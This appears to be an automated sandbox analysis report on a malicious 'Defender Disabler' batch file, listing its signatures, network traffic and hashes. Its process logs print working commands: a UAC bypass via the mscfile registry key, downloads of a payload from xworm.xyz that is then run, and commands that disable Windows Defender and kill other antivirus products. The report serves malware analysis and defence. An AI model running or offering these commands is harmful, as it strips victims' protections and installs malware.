Analysis Overview
SHA256
acdf188d1f3e0d039a2e1b375566acdf640196cbb42ead21be755f9c438e041e
Threat Level: Known bad
The file Uac Bypass Windows Defender Disabler.bat was found to be: Known bad.
Malicious Activity Summary
Disables service(s)
Modifies Windows Defender Real-time Protection settings
Windows security bypass
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
Launches sc.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Kills process with taskkill
Modifies registry key
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-29 21:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-29 21:12
Reported
2024-07-29 21:15
Platform
win10-20240404-en
Max time kernel
133s
Max time network
138s
Command Line
Signatures
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Stops running service(s)
Launches sc.exe
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Roaming" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Local\Temp" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScheduledScan" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableTamperProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0 -PropertyType DWORD -Force"
C:\Windows\system32\sc.exe
sc stop mfevtp
C:\Windows\system32\sc.exe
sc config mfevtp start= disabled
C:\Windows\system32\sc.exe
sc stop mfefire
C:\Windows\system32\sc.exe
sc config mfefire start= disabled
C:\Windows\system32\sc.exe
sc stop mfehidk
C:\Windows\system32\sc.exe
sc config mfehidk start= disabled
C:\Windows\system32\sc.exe
sc stop mfeapfk
C:\Windows\system32\sc.exe
sc config mfeapfk start= disabled
C:\Windows\system32\sc.exe
sc stop mfeavfk
C:\Windows\system32\sc.exe
sc config mfeavfk start= disabled
C:\Windows\system32\sc.exe
sc stop mfefirek
C:\Windows\system32\sc.exe
sc config mfefirek start= disabled
C:\Windows\system32\sc.exe
sc stop avastsvc
C:\Windows\system32\sc.exe
sc config avastsvc start= disabled
C:\Windows\system32\sc.exe
sc stop avastui
C:\Windows\system32\sc.exe
sc config avastui start= disabled
C:\Windows\system32\sc.exe
sc stop nissrv
C:\Windows\system32\sc.exe
sc config nissrv start= disabled
C:\Windows\system32\sc.exe
sc stop Symantec AntiVirus
C:\Windows\system32\sc.exe
sc config "Symantec AntiVirus" start= disabled
C:\Windows\system32\sc.exe
sc stop ccSvcHst
C:\Windows\system32\sc.exe
sc config ccSvcHst start= disabled
C:\Windows\system32\sc.exe
sc stop NortonSecurity
C:\Windows\system32\sc.exe
sc config NortonSecurity start= disabled
C:\Windows\system32\sc.exe
sc stop Norton AntiVirus
C:\Windows\system32\sc.exe
sc config "Norton AntiVirus" start= disabled
C:\Windows\system32\taskkill.exe
taskkill /F /IM Mcafee
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcafee
C:\Windows\system32\taskkill.exe
taskkill /F /IM Mcafee.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcafee.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McUICnt.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McPltCmd.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mcuihost.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McInstru.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM avastui.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ccSvcHst.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mfefirek.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM mfehidk.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM avastsvc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McUICnt.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM McPltCmd.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ModuleCoreService.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ZhuDongFangYu.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM 360Safe.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM 360Tray.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM ns.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | xworm.xyz | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 193.114.54.198.in-addr.arpa | udp |
| US | 198.54.114.193:443 | xworm.xyz | tcp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
memory/4004-4-0x00007FFC29E13000-0x00007FFC29E14000-memory.dmp
memory/4004-5-0x0000016B271C0000-0x0000016B271E2000-memory.dmp
memory/4004-7-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp
memory/4004-9-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp
memory/4004-10-0x0000016B27370000-0x0000016B273E6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hvsc3lbd.kxi.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4004-25-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp
memory/4004-31-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
| MD5 | 03bf8860dbd0724e466baf1e1bca86b3 |
| SHA1 | bde4d3ef9ac846e1e83bea37f88097cd370d5197 |
| SHA256 | 968dc5ab087e7a593d9b2682c2f6ee8aa6fd756ae874328a12d892d2b68fd0af |
| SHA512 | 0f3f5492be21a3af8262363f3d593aa63080f2d2db574451d8b94d4f00c3c3f06cb17c5795e6cccef84e9ebe684062a51829139177f7539f6629373e56e2e92f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 42d4b1d78e6e092af15c7aef34e5cf45 |
| SHA1 | 6cf9d0e674430680f67260194d3185667a2bb77b |
| SHA256 | c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0 |
| SHA512 | d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8a15e30f9c44a503e3666936a851b0f7 |
| SHA1 | 65edb50e8fd7cd7077749165c8544b08ae094e5e |
| SHA256 | 1ff7c93f3aba06119b7b8663dc8fd00780d965cdde5afae68ea6603601771441 |
| SHA512 | 539a2043e27f058c81370a5d1b35f2c18af866c6416751c0d77aa3439392c8b254096055da83b1719ae066d8ded6a8c7d974a5fe5cd7873d664a6613de3907ec |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c6ab1c560795981f7ae9739268cfe22e |
| SHA1 | 289d5ae79442bba5353821f7bdbb4075f52b8013 |
| SHA256 | cfe7887979a8fbb050bc46de23567bd2b757784a389faa4cee691e5ba8ea9a20 |
| SHA512 | 717ee3dad2daa8ec4fa9d55d25c377637858194af3562b291e9672a767edd7b7faecb9a54e27eef9ed5b2a7072e873718daa538c33e761f565a5c5c7e84da988 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-29 21:12
Reported
2024-07-29 21:15
Platform
win11-20240709-en
Max time kernel
147s
Max time network
153s
Command Line
Signatures
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\system32\reg.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Stops running service(s)
Launches sc.exe
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-95457810-830748662-4054918673-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start= disabled
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
